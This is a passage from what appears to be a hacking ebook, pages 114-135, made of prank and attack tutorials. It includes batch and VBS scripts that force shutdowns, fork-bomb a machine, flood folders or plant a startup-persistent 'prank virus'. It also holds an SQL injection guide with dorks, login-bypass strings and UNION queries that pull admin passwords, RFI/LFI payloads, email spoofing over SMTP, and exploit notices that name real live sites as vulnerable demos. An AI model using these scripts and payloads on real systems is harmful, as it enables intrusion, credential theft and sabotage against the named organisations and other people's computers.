Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree This one is kind of an annoying trick and if used unknowingly can certainly cause problems (am serious). What this trick does is, after conveying a (any) message it shuts down the computer without any confirmation. In order to create the Shutdown file, follow the below mentioned steps:
Open Notepad. Paste the following code in it:
@echo off msg * Its time to get some rest. shutdown -c ―Error! You have to take rest! Byeeeeee‖ -s
Save the file with any name but with .bat extension and close it. For eg. TakeRest.bat
NOTE : Use this carefully. If you are playing prank then keep in mind that this may lead to loss as it shuts down the computer forcefully. 10. TOGGLE KEYBOARD BUTTON SIMULTANEOUSLY Using Notepad (and VB) you can set different keys on your keyboard to toggle continuously. Following are the 3 tricks using which different keys can be set to toggle simultaneously. Follow the steps given under each head to try out the tricks. 1. Caps Lock Key o o
Open Notepad. Paste the following code in the notepad file:
Set wshShell =wscript.CreateObject(―WScript.Shell‖) do wscript.sleep 100 wshshell.sendkeys ―{CAPSLOCK}‖ loop o o
Save the file with anyname and .vbs extension. and close it. Now open the newly created file and see how the caps lock key behaves on your keyboard!
2. Hit Enter Key Continuously o
Open Notepad.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 114
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree o
Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(―WScript.Shell‖) do wscript.sleep 100 wshshell.sendkeys ―~(enter)‖ loop o o
Save the file with any name and .vbs extension and close it. Now open the newly created file and see how the enter key behaves!
3. Hit Backspace Key Continuously o o
Open Notepad. Paste the following code in the notepad file:
MsgBox ―Lets Rumble‖ Set wshShell =wscript.CreateObject(―WScript.Shell‖) do wscript.sleep 100 wshshell.sendkeys ―{bs}‖ loop o o
Save the file with any name and with .vbs extension and close it. Now open the newly created file and see how the key behaves!
In order to end the vbs script (stop continuous key presses), open task manager and end the wscript.exe process as shown in image below.
11. SLOWLY TYPE MESSAGES
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 115
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree This one is my favorite. Completely harmless trick and perfect for playing pranks on one‘s friends. This trick can really freak out anyone! Follow the below mentioned steps to perform this trick:
Open Notepad. Paste the following code in the notepad file:
WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject(―WScript.Shell‖) WshShell.Run ―notepad‖ WScript.Sleep 100 WshShell.AppActivate ―Notepad‖ WScript.Sleep 500 WshShell.SendKeys ―Hel‖ WScript.Sleep 500 WshShell.SendKeys ―lo ‖ WScript.Sleep 500 WshShell.SendKeys ―, ho‖ WScript.Sleep 500 WshShell.SendKeys ―w a‖ WScript.Sleep 500 WshShell.SendKeys ―re ‖ WScript.Sleep 500 WshShell.SendKeys ―you‖ WScript.Sleep 500 WshShell.SendKeys ―? ‖ WScript.Sleep 500 WshShell.SendKeys ―I a‖ Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 116
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree WScript.Sleep 500 WshShell.SendKeys ―m g‖ WScript.Sleep 500 WshShell.SendKeys ―ood‖ WScript.Sleep 500 WshShell.SendKeys ‖ th‖ WScript.Sleep 500 WshShell.SendKeys ―ank‖ WScript.Sleep 500 WshShell.SendKeys ―s! ―
Save the file with any name and with .vbs extension and close it.
Now open the file and see how freakishly slow the messages appear! NOTE: In order to stop it. Follow the ―Note‖ given in 10th Trick. 12. TYPE “YOU ARE A FOOL” CONTINUOUSLY Not much to explain, the title says it all! Follow the steps to make this trick work:
Open Notepad. Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(―WScript.Shell‖) do wscript.sleep 100 wshshell.sendkeys ―You are a fool.‖ loop
Save the file with any name but with .vbs extension and close it.
Ope the file and see how it makes you type! NOTE: In order to stop it. Follow the ―Note‖ given in 10th Trick. 13. OPEN NOTEPAD CONTINUOUSLY Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 117
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Open Notepad. Paste the following code in your notepad file:
@ECHO off :top START %SystemRoot%system32notepad.exe GOTO top
Save the file with any name nut with .bat extension and close it.
Now open the file and see how it annoys you by opening notepad again and again. 14. PICK YOUR OPTION BATCH FILE When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below – Action accompanied by number): 1 – Shut‘s down the computer 2 – Restart‘s the computer 3 – Wipes out the hard drive 4 – Net send 5 – Shows a message & then shut‘s down the computer Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else‘s on which you are running this file) computer system. So BEWARE! In order to create the file, follow the steps given below:
Open Notepad. Paste the following code in the notepad file:
@echo off title Get A Life cd C: :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‗x‘ then your PC will be formatted. Do not cry if you loose your data or anything. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 118
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree pause echo Pick your option: echo 1. Die Slowly echo 2. Instant Death echo 3. Stay Away From This One echo 4. Die this way (For Wimps!) echo 5. Easy way out set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two
Save the file with any name and with a .bat extension and close the file.
15.LOCK FILE(S) ON WINDOWS WITHOUT USING
ANY SOFTWARE
How many times have you wished of a software using which you can hide or lock files, restricting its access to other unwanted users. Although there are various software available in market using which you can easily lock/hide files but, i personally dont trust them because most of them are bloatware or spyware. In this post i am going to share a simple yet powerful way of locking and hiding important files using a the following method. Follow the instructions to make you own Locker ( Without any software !! ) :
Open notepad. Copy the following code in notepad file :
cls @ECHO OFF title Folder Locker if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 119
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock folder set/p "pass=>" if NOT %pass%==YOUR PASSWORD HERE goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDLOCKER md Locker echo Locker created successfully goto End :End
Change the “YOUR PASSWORD HERE” with your password. Save it as batch file ( with extension .bat ) For eg. Locker.bat Now you will see a batch file. Double click it to create a folder locker ( A new folder named Locker would be formed at the same location ) Thats it you have now created your own locker and that too without using any software ! Brings all the files you want to hide in the locker folder. Double click the batch ( As created above ) file to lock the folder namely Locker.
If you want to unlock your files, simple double click the batch file again and you would be prompted for password ( In DOS window ). Enter the password and enjoy access to the folder. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 120
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree But don‘t delete .bat file and loose your stuff……. 16.CONVERT TEXT INTO AUDIO USING NOTEPAD 1. Open Notepad file on your Windows PC. 2. Copy and paste the below mentioned code :
Dim msg, sapi msg=InputBox("Enter your text for conversion– www.knowhacking.wordpress.com","Knowhacking Text-To-Audio Converter") Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg 3. Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs
Thats it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK. If you find any difficulties in using this code, let me know via comments section. 17.FORMAT YOUR HARD DISK USING JUST NOTEPAD !! Ever wondered of a way to format your hard disk using just notepad ? I bet you haven‘t even thought about it or if you have had then you would still have preferred using reliable software‘s available to do the job. In this post i am going to share a simple way to format your C drive (Yep, only C drive) using just notepad. This is just a nice little nifty trick, which i am sharing with you. Make sure you don‘t actually use it on your business computer. Try to make this trick work in a VMWare Machine in your free time. Moving on, in order to completely format your C: Drive (Primary disk) follow the steps given below :-Open notepad. Type the following the code in it (Or just copy paste it). 01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 Save it as an .exe file giving any name you desire.Thats It ! Now just double click on the file (to open it) and your C: drive will be formatted ! This is just a little binary fun. Be Careful while using it. Hack Tutrial:TRICKS & HACK WITH BATCH FILE (.BAT FILE)
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 121
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Welcome to (HACKING begins - "An approach to introduce people with the truth of HACKING"), Hello friends, Today in this post I'll show you how can you prank or make fake viruses using batch files, In my earlier post I'll introduce you with the BEGINNERS GUIDE TO BATCH PROGRAMMING, here you find some basic about batch file, now begin with some programs in batch file so with the help of this program you can make prank or make some fake viruses. We know that Batch files are basically plain text file containing DOS command. You can edit or write your batch file with notepad or DOS editor(EDIT). Always remember that a batch file should have an extension.BAT. 1. MATRIX EFFECT ▼ Follow the steps and see the amazing matrix effect happen in your DOS window :
Open Notepad. Copy the below mentioned text in your notepad file:
@echo off color 02 :start echo %random% %random% %random% %random% HACKING begins %random% %random% %random% %random% %random% %random% goto start
Save the file with .bat extension like Matrix.bat. you can also change the text and color.
2. CONTINUOUSLY REPEAT MESSAGE ▼ Using this notepad trick you can annoy anyone and can actually force them to log off . This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:
Open Notepad. Copy the below mentioned text in your notepad file:
@echo off :BEGIN Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 122
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree msg * Welcome msg * To msg * HACKING begins msg * Thanks for visiting goto BEGIN
Save the file with .bat extension like message.bat. After saving the file just open it (by double clicking) and see what happens.
3. Open Notepad CONTINUOUSLY ▼ Follow these steps to open Notepad continuously:
Open Notepad. Copy the below mentioned text in your notepad file:
@echo off :TOP START %SystemRoot%/system32/notepad.exe goto TOP
Save the file with any name nut with .bat extension and close it.
Now open the file and see how it annoys you by opening notepad again and again. you can also save this .bat file into the C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder, so when you start your computer then file runs into your computer & then Notepad continuously open in window. 4.OPEN CMD CONTINUOUSLY ▼ This trick is used to open CMD continuously till then you want, just open Notepad and write : START, depending upon you how many times you want to open CMD, you can make as many as you would like.
Save file as any name you want with .bat extension. Then open that file and you observe that how many times you write START in Notepad, the CMD console box is open same as number of START written in Notepad. 5. SHUTDOWN SYSTEM WITH MESSAGE ▼ This trick is used for shutdown your friend system, after display an message. When you friend or victim click on OK button, then the bat file force the system to shutdown. Follow these steps to turn off system. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 123
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Open Notepad. Copy & paste the below code into Notepad.
@echo off cls msg * I HATE YOU shutdown -s -c "ERROR! YOU ARE HACKED"
Save the file with any name nut with .bat extension and close it.You can stop execution of file by typing "shutdown -a" in RUN dialog box.
6. Crash a Computer with just a link▼ Click Here (http://tiny.cc/ibJUN) HAHAHAHA 7. FOLDER BOMBER ▼THIS BATCH FILE WILL CREATE 3000+ FOLDER IN LESS THAN A MINUTE. Open your notepad and type the following codes. @echo off :top md %random% goto top
Save it as 3000.bat Give this file to your friend and when he will click on that his nightmare will be started.
Above Code Explained. @echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and
%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop. 8. Fork Bomber It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste the below codes and save it as fork.bat :s<br />start %0<br />%0|%0<br />goto :s<br /> Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 124
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 9. Getting Blue Screen Of Death (BOSD) YOU MAY BE SURPRISED TO KNOW THAT WINDOWS HAS A BUILT -IN SELF-CRASHING MECHANISM (NO PUN INTENDED ). THOUGH IT IS QUITE EASY TO CRASH A W INDOWS BOX WHENEVER
you doesn't want it to crash, it may be quite difficult to reproduce the scenario, when you desperately want your box crashed. So here we give you two methods to
crash your Windows box Method 1: Windows Built-in Self Crasher This method produces the 'awesome' BSOD (Blue Screen Of Death) that you are no doubt familiar with. The PC gets locked up and the only way to recover is to
reboot it. Just follow these steps: Run Regedit (Start -> Run -> regedit) Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Par ameters Create a new DWORD value with name CrashOnCtrlScroll and give it a value 1 Reboot the PC Now whenever you want to see the cute blue screen (and crash your system), press and hold the Ctrl key on the right side of the keyboard and hit the Scroll Lock key
twice. 10. Prank Virus Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly. @echo off echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs echo Set colCDROMs=oWMP.cdromCollection>>123.vbs echo do>>123.vbs echo if colCDROMs.count>=1 then>>123.vbs echo for i=0 to colCDROMs.Count -1>>123.vbs echo colCDROMs.Item(i).Eject>>123.vbs echo Next>>123.vbs echo For i=0 to colCDROMs.Count -1>>123.vbs echo colCDROMs.Item(i).Eject>>123.vbs echo Next>>123.vbs echo End If>>123.vbs Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 125
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree echo wscript.sleep 5000>>123.vbs echo loop>>123.vbs echo DO>>1234.vbs echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs echo LOOP>>1234.vbs copy /y 123.vbs C:\ copy /y 1234.vbs C:\ attrib +s +h c:\123.vbs attrib +s +h c:\1234.vbs reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polici es\Explorer\ /v NoClose /t REG_DWORD /f /d 1 reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\poli cies\system\ /v legalnoticetext /f /d "YOR ARE BEEN SCREWED" reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\poli cies\system\ /v legalnoticecaption /f /d "B0zZ_ErR0r" reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs attrib +s +h c:\123.vbs attrib +s +h c:\1234.vbs start 123.vbs start 1234.vbs echo Code Smahser owns your computer!!>>c:\almasmalik.txt echo Code Smahser owns your computer!!>>d:\almasmalik.txt echo Code Smahser owns your computer!!>>e:\almasmalik.txt msg * MAY YOUR COMPUTER "REST IN PEACE" Hack Tutrial:Q what is sql injection? A injecting sql queries into another database or using queries to get auth bypass as an admin. part 1 : Basic sql injection Gaining auth bypass on an admin account. Most sites vulnerable to this are .asp First we need 2 find a site, start by opening google. Now we type our dork: "defenition of dork" 'a search entry for a certain type of Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 126
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree site/exploit .ect" There is a large number of google dork for basic sql injection. here is the best: "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" Now what to do once we get to our site. the site should look something like this : welcome to xxxxxxxxxx administrator panel username : password : so what we do here is in the username we always type "Admin" and for our password we type our sql injection here is a list of sql injections ' or '1'='1 ' or 'x'='x ' or 0=0 -" or 0=0 -or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-" or 1=1-or 1=1-' or a=a-" or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- 'or'1=1' there are many more but these are the best ones that i know of and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass. So your input should look like this username:Admin password:'or'1'='1 So click submit and you'r in NOTE not all sites are vulnerable. part 2: injecting sql queries to extract the admin username and password ok so lets say we have a site : http://www.xxxxx.com/index.php?catid=1 there is a list of dork 4 sites lyk this "inurl:index.php?catid=" "inurl:news.php?catid=" "inurl:index.php?id=" "inurl:news.php?id=" or the best in my view "full credit to qabandi for discovering this" "inurl:".php?catid=" site:xxx" So once you have you'r site http://www.xxxx.com/index.php?catid=1 now we add a ' to the end of the url so the site is http://www.xxxx.com/index.php?catid=1' Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 127
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree if there is an error of some sort then it is vulnerable now we need to find the number of columns in the sql database so we type http://www.xxxx.com/index.php?catid=1 order by 1-- "no error" http://www.xxxx.com/index.php?catid=1 order by 2-- "no error" http://www.xxxx.com/index.php?catid=1 order by 3-- "no error" http://www.xxxx.com/index.php?catid=1 order by 4-- "no error" http://www.xxxx.com/index.php?catid=1 order by 5-- "error" so this database has 4 columns because we got an error on 5 on some databases there is 2 columns and on some 200 it varies so once we have the column number. we try the union function http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database" if you see some numbers like 1 2 3 4 on the screen or the column names it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db so now we need to info about the db so lets say the numbers 2 and 4 showed up on the screen so i will use my query on 2 http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4-the db type and version will pop up on the screen if the db version is 4 or lower then to extract the password you will need these queries http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4-this should display the table containing the admin username and password but if not then you will have to guess the table so once you have your table "or not" then type http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename-where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess then once u have the right table name you should get the administrator password then just do the same thing but type username instead of password sometimes the password is hashed and you need to crack it. then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de.com/c0de/perl/admin_1.2_.txt now if the database is version 5 or up type http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables-Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 128
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree and that will display a list of all the tables once you have your table name type the same thing as 4 http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable-then the same with username but now if it doesnt work far all those things just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing just play around with those but sometimes we also need to use the version() or version@@ so sometimes UNION SELECT version (),password,3,4 FROM admintable-or UNION SELECT version @@,password,3,4 FROM admintable-well that about wraps up my sql injection tutorial.============================================================== ====I hope you can know understand everything about SQL Injections.Take care. Hack Tutrial:TINYMCE AJAXFILEMANAGER UPLOAD VULNERABILITY Web References:http://packetstormsecurity.org/files/101793/ TinyMCE-AjaxFileManager-Shell-Upload.html http://secunia.com/advisories/44760/ http://securityreason.com/wlb_show/WLB-2011050108
######################################################### # Title : TinyMCE Upload Vulnerability # Author: Dr Trojan # Greets to all my friends and everyone i know (mtahirzahid.blogspot.com) # Vendor: http://www.phpletter.com/Demo/ Tinymce-Ajax-File-Manager/ # Email : mtahirzahid@gmail.com # Date : 29/05/2015 # Dork : "tiny_mce/plugins/ajaxfilemanager" # Category : PHP [File Upload Vulnerability] # Tested on: [Windows 7, Linux Ubuntu] ######################################################### Exploit # http:// [localhost]/[path]/jscripts/tiny_mce/plugins/ ajaxfilemanager/ajaxfilemanager.php # http:// [localhost]/jscripts/tiny_mce/plugins/ ajaxfilemanager/ajaxfilemanager.php # File Extention [.txt],[.jpg],[gif],[bmp] Demo http://sns.yhgs.gov.cn/plugins/tiny_mce/plugins/ Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 129
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree ajaxfilemanager/ajaxfilemanager.php# Preview http://sns.yhgs.gov.cn/uploaded/temp/trojan.txt Hack Tutrial:0-DAY RFI & LFI IN WORDPRESS 3.1 PLUGIN VULNERABILITY RELEASED Web References:http://packetstormsecurity.org/files/100297/WordPress-Spellchecker-Local-FileInclusion-Remote-File-Inclusion.html http://packetstorm.linuxsecurity.com/1104-exploits/wpspellchecker-rfilfi.txt http://securityreason.com/wlb_show/WLB-2011040079 http://www.securityhome.eu/exploits/exploit.php?eid=13843116614da43163eb7a76.2 0091642 --------------------------------------------------------------------------------+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++ ======++++++ RFI & LFI Wordpress Spellchecker Plugin Vulnerability ++++++====== +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++ --------------------------------------------------------------------------------Released Date = 12/4/2015 --------------------------------------------------------------------------------Author = Dr (mtahirzahid.blogspot.com) --------------------------------------------------------------------------------Greets = Sac - tz - Shadow00 - Hacker - Death Angel - Tahir --------------------------------------------------------------------------------Version = 3.1 --------------------------------------------------------------------------------Tested On = Windows 7 & Xampp --------------------------------------------------------------------------------Rfi Exploit = /general.php?file=http://sitename.com/Evil.txt? Lfi Exploit = /general.php?file=../../../../../../../etc/passwd Root Location = wordpress/wpincludes/js/tinymce/plugins/spellchecker/includes/general.php Web Location = www.sitename.com/general.php?file= P.O.C:RFI Example = www.sitename.com/general.php?file=http://sitename.com/Evil.txt? LFI Example = www.sitename.com/general.php?file=../../../../../../../etc/passwd User Input = $_GET Potentially Vulnerable Function = require Vulnerability description:An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 130
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise. Vulnerable Example Code = Patch for vulnerability: Build a whitelist for positive file names. Do not only limit the file name to specific paths or extensions. php", "main.php"); if(!in_array($_GET["file"], $files)) exit; ?> Hack Tutrial:PUNJAB UNIVERSITY IS UNSECURE Well as you all know ,i found bugs in Lums and Fast university websites and send advisory to the university admins,Now today i feel ashamed when penetrating Punjab University website,It was hard because they are really secure but i successfully found a bug .Link:http://www.pu.edu.pk/faculty/descriptions.asp?faculty=1000001 This link is vulnerable to MSSQL INJECTION. Please secure it as soon as possible. TABLE DUMPS admission administrative administrativetitle administrativepro administrativeid administrativedesacademiccalendar academic MA_EDU_II_S09 MBBS_NR_ S2009 job aff_info faculty aboutmain depts glance newsnotices workshop Vw_PhdDepartmentFacultyWise Vw_AffiliationMed toplink2 toplink tender systables seminar schedule results qlinks2 q links publication programs press phd_fac phd_detail phd_dept med_affilited_status mainlink2 mainlink glancelhr fee faculties facility examination examforms email deptclass deptabout deg ree datesheet conference collaboration collaboration campuses bottomtext2 bottomtext aff_subject aff_g ender aff_district aff_college admissionss admissions admission notice Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 131
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 132
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Hack Tutrial:TIO LOCO, LLC SQLI EXPLOIT BY DO.VIRU$ [~]Start With The Name Of Allah....WHo Blessed Me With knowledge..... [~]Exploit Title
:Hack, TZ • ©2015
[~]Author
:tz
[~]Home Page
:http://mtahirzahid.blogspot.com/
[~]Exploit find By
:tz
[~]Contact
:mtahirzahid@yahoo.com
[~]Note To hack Team....:P
:Iam tz$ From the uNknOwn Plcae.....And Belong
[~]Google Dork
inurl:Designed and hosted by Tio Loco, LLC
############################################## ===[ POC ]=== http://website/products.php?prodID=[SQL] Demo Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 133
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree ############################################## http://zenunderwater.com/products.php?prodID=4 http://www.robinsnestfarms.com/index.php?horseID=197 • We Will Never Stop Hacking • Its not a game • It's Our Job #########################tahir.zahid$######################### Greetz T0 : Tzsu hacker De bLaCk InNCrimInAl No Hat Cod6 tahir .....And All To My Friends....... Hack Tutrial:SKYWALK TECHNOLOGIES SQLI VLUN DO.VIRU$ [~]Start With The Name Of Allah....WHo Blessed Me With Such knowledge..... [~]Exploit Title :Skywalk Technologies [~]Exploit Type :Sql Injection [~]Author :tz [~]Home Page :http://mtahirzahid.blogspot.com/ [~]Exploit find By :tz [~]Contact : http://mtahirzahidsu.blogspot.com/ [~]Note :Iam tz From the uNknOwn Plcae.....And Belong To tz Team....:P [~]Google Dork inurl:"Powered By Skywalk Technologies" ############################################## ===[ POC ]=== http://website/viewdetails.php?id=[SQL] http://website/news_details.php?id=[SQL] http://website/news_details.php?id=[SQL] http://website/view_all_directories.php?id=[SQL] And Many More Urls..... Demo ############################################## www.tirupurdetails.com/view_all_directories.php?id=19 www.erodedetails.com/news_details.php?id=37 www.covaidetails.com/viewdetails.php?id=86 ############################################## Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 134
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree • We Will Never Stop Hacking • Its not a game • It's Our Job ########################tz######################## Greetz T0 : Tz Hack Tutrial:SYMLINKING (PRIV8 EXPLOIT) URDUHACK TEAM
OKEAH GUY' S, HERE IS THE EXPLOIT FOR EVERY ONE, ENJOY IT , IT'S SYMLINK _OPEN _BASE_ DIRECTORY EXPLOIT . HAPPY SYMLINKING PEOPLES ...HERE IS DOWNLOAD LINK :HTTP://WWW.MEDIAFIRE . COM/?1419VM2IMTNBARP I SINCERELY HOPE, YOU ENJOY THIS.. Hack Tutrial:EMAIL FORGE ,S END EMAIL FROM ANYONE . 1. Some ISP's block port 25 so it might not work 2. Most likely, you won't be able to see what yer typing First of all, you need an SMTP server. These are extremely common and, in fact, I'll provide one for you (mail.hotmail.com). SMTP: Simple Mail Transfer Protocol. This service runs on port 25 (in most cases) and is used to send outgoing email. Now, open up the command prompt and telnet to mail.hotmail.com on port 25 (note: to see what you type, type telnet and enter then type in set local_echo):
code:-------------------------------------------------------------------------------telnet mail.hotmail.com 25 --------------------------------------------------------------------------------
When yer connected type in (except what's in between *'s; you chose what will go in the []): Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 135
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree code:-------------------------------------------------------------------------------helo *wait* mail from:[whoever]@[whoever.com] *wait* rcpt to:[whoever]@[whoever.com] *wait* data *wait* [write] [whatever you want] [in] [as many] [lines as wished] . *wait* quit --------------------------------------------------------------------------------
Hello is just a handshake with the server. Mail from: is FROM who you want the email to be. rcpt to: is who you want the email to go to. under data is what you want sent. the '.' ends data. quit quits. There! simple isn't it. Hack Tutrial:MY DORKS LIST RFI
